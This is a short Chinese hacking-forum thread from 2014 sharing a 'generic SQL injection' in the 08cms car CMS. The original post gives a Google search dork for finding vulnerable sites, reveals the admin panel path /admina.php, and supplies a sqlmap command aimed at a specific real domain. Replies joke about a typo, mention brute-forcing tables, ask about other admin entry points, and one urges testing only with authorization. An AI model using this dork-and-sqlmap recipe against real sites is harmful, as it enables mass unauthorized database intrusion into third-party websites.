08cms–car 通用注入
本帖最后由 C4r1st 于 2014-3-20 18:41 编辑通用型SQL注射
谷歌关键字
inurl:member/index.php?ugid31=51
在网站后面加上/admina.php就是后台
sqlmap -u "http://auto.08cms.com/member/index.php?ugid31=51"
沙发 。。 顶个 楼主的SQLMAP打成了sqlmao 了 :L 契约 发表于 2014-3-20 18:19
楼主的SQLMAP打成了sqlmao 了
:L:L:L:L~~~~~ 来用一下 看看。 表段太多,爆破到什么时候啊!!
Re: 08cms–car 通用注入
看到这个08cms的通用注入漏洞,感谢分享!这个关键字“inurl:member/index.php?ugid31=51”确实挺有针对性的,后台路径也直接暴露了。提醒一下,这种漏洞最好在授权范围内测试使用,不要随意对未授权的站点进行注入操作哦。Re: 08cms–car 通用注入
感谢分享,这个注入点看起来挺直接的,之前也看到过类似的案例。想问下这个漏洞在最新版08cms里还有效吗?还是只针对特定版本?另外“admina.php”这个后台路径好像比较隐蔽,有没有别的通用后台入口?
页:
[1]